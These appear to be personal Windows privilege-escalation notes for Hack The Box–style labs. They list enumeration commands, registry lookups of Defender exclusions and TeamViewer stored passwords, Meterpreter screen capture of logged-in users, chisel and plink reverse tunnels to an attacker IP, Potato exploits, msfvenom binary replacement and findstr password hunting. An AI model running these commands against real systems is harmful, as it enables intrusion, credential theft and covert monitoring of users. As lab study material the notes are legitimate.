Windows PrivEsc (Extra Tricks)

Go through each check on the list in case of depression!!

Interesting local groups & their members

PowerShell command to check all local groups - Get-LocalGroup

PowerShell command to list group members - Get-LocalGroupMember <group-name>

Checking installed applications (Windows Registry)

32-bit applications ->

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall*" | select displayname

64-bit applications ->

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall*" | select displayname

Check for localhost or blocked ports

Sometimes, interesting ports are running on localhost and sometimes ports are publicly blocked by some rules.

And, these ports can be identified by commands like ->

netstat -ano OR netstat -antp TCP #Provide the protocol at the end

And, the ports look like this -

Localhost Port --> 127.0.0.1:8080 #Only accessible through localhost

Blocked port --> 0.0.0.0:80 #Not showing up in Nmap scan (hence blocked)

Always, look for these kind of ports

Check if there are other drives available on the target or not -

wmic logicaldisk get deviceid, volumename, description

Fetching PowerShell Console History file

(Get-PSReadlineOption).HistorySavePath
#Returns path of the PShistory file which we can read directly

Directories or Files free from Windows Defender -

This is useful to run scripts or executables which might get flagged as malicious by antivirus or defender -

reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"

To list hidden files in CMD & Powershell

In CMD, run this command to list hidden files & folders -

dir /a:h C:<directory>   #To display hidden files in a particular directory
dir /a:d                 #To display hidden directories

In PowerShell, run this command -

ls -Force

Check for Interesting Services -

1. Using tasklist

Run tasklist command for this or look at the winpEAS output carefully.

Run Get-Process from powershell in case tasklist doesn't work.

2. Checking default directories

Check "Program Files" and "Program Files (x86)" directories for interesting applications or softwares. Or, atleast search google for exploits for those applications.

Exploiting Teamviewer service -

If teamviewer service is running then we can look for user credentials there.

First, identify the version of teamviewer by visiting its installation directory in "Program Files" or "Program Files(x86)".

Second, according to the version of teamviewer installed, look for one of these registries -

HKLM\SOFTWARE\WOW6432Node\TeamViewer\Versionx    #Replace x by version number
HKLM\SOFTWARE\TeamViewer\Temp
HKLM\SOFTWARE\TeamViewer

Move into that registry -

cd HKLM:\software\wow6432node\teamviewer\versionx

Run this command to list various properties of that registry -

get-itemproperty -path .

Run this command to list "SecurityPasswordAES" property (which will dump a lot of integers) -

(get-itemproperty -path .).SecurityPasswordAES

Now, using these integers, the password can be easily decrypted with the help of a python script used in this blog (HTB Remote 0xdf writeup) -

https://0xdf.gitlab.io/2020/09/05/htb-remote.html

#Go to the last part of the writeup.

Exploiting running interactive session of current user (Using Metasploit)

If winpeas shows that the current user has some interactive sessions going on or RDP session going on then we can exploit it using Metasploit.

Use this command to list all running processes or tasks -

get-process

If SI value of a process is 0, it means its not interactive otherwise it is.

We can use meterpreter session to take screenshots of interactive logon sessions by just running -

screenshot  #take screenshots of desktop in regular intervals by running this command
screenshare #provides a kind of live streaming of user desktop actions

Try pivoting to the services that are running on internal ports (like SMB, etc.) -

Using plink.exe ->

.\plink64.exe -P 22022 -l root -R 8080:127.0.0.1:8080 10.10.14.78

Using chisel->

Step 1 - (On Attacker machine)

#Using chisel to listen on port 9001

./chisel_1.7.6_linux_amd64 server -p 9001 --reverse

Step 2 - (On Target machine)

#Forwarding target port 445 to local port 445

.\chisel_1.7.6_windows_amd64.exe client 10.10.14.78:9001 R:445:127.0.0.1:445
#10.10.14.78 is attacker IP

Reference for above commands ->

HackTheBox – WorkerIvan's IT learning blog

Upload/Download files using evil-winrm -

If we have evil-winrm access to the target then we can easily download or upload files with it ->

upload <filename>    #uploading file from kali (local machine)
download <absolute-file-path>  #downloading file from kali (local machine)

Juicy Potato / Rogue Potato / PrintSpoofer exploits -

For versions above Windows server 2019 and Windows 10 BUILD equals to or greater than 1809, RoguePotato & PrintSpoofer works but not Juicypotato.

#Example -> JuicyPotato doesn't work on Windows 10 build 18363

OS Version Check

Juicy Potato - do NOT work on any version of Server 2019 AND on any Windows 10 versions >=1809

Print Spoofer - all versions of Server 2016 and Server 2019 & Windows 10 version >1607 & Windows Server 2022 is also exploitable with this

Rogue Potato - Windows 10 / Server 2019 OS from version 1809 (onwards) & Windows Server 2022 is also exploitable with this

Detailed explanation for all 3 exploit methods ->

https://juggernaut-sec.com/seimpersonateprivilege/

Official Potato Website ->

https://jlajara.gitlab.io/Potatoes_Windows_Privesc

Check last sections of this blog for both RoguePotato & PrintSpoofer exploit -

HackTheBox: RemoteMedium

Remote HTB Walkthrough

Check these blogs for JuicyPotato exploit -

Hack The Box — Bounty Writeup w/o MetasploitMedium

Bounty HTB Writeup

Hack The Box — Bart Writeup w/o MetasploitMedium

Bart HTB Writeup

Adding users to sensitive groups -

By adding users to privileged groups we can perform sensitive actions. And, that can be done easily with net.exe -

net group <groupname> <username> /add           #Adding user to local group
net group <groupname> <username> /add /domain   #Adding user to domain level group

Exploiting SeBackupPrivilege (Privilege Escalation)

If this privilege is set in either AD machine or non-AD machine, it can be exploited to get privileged access to the machine.

Run -> whoami /priv

If this privilege is set, then we can exploit them as explained in this blog to get admin privileges ->

https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/

Replacing interesting binaries with malicious ones

If there is an interesting binary present in the target and we think that it is running in some intervals. We can try to replace it with our binary if we have enough permissions.

Steps ->

1. Create a backup of original binary (in case this hunch doesn't work)

2. Use msfvenom to create malicious binary or payload

3. Replace the existing one with your binary

4. Wait for your binary to get executed ( OR try executing it if you have permission to do so)

AlwaysInstallElevated PrivEsc

If we have this enabled, then we can very easily escalated our privileges to get SYSTEM shell.

PowerUp POC for AlwaysInstallElevated

To perform check, run PowerUp (check above screenshot) OR Run the below commands ->

1. reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

2. reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

If these registeries are set to 0x1 like given below, then they are vulnerable -

Registry check

For exploitation, refer to Notion!!

Hunting for Credentials

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*

# Find all passwords in all files.
findstr /spin "password" *.*
findstr /spin "password" *.*

Scheduled tasks

This command creates a log.txt file with all the scheduled tasks in it -

schtasks /query /fo LIST /v > log.txt

Exploiting Modifiable files

Use PowerUp.ps1 to identify which binaries/files are modifiable.

And, then run manual enumeration if it is exploitable or not.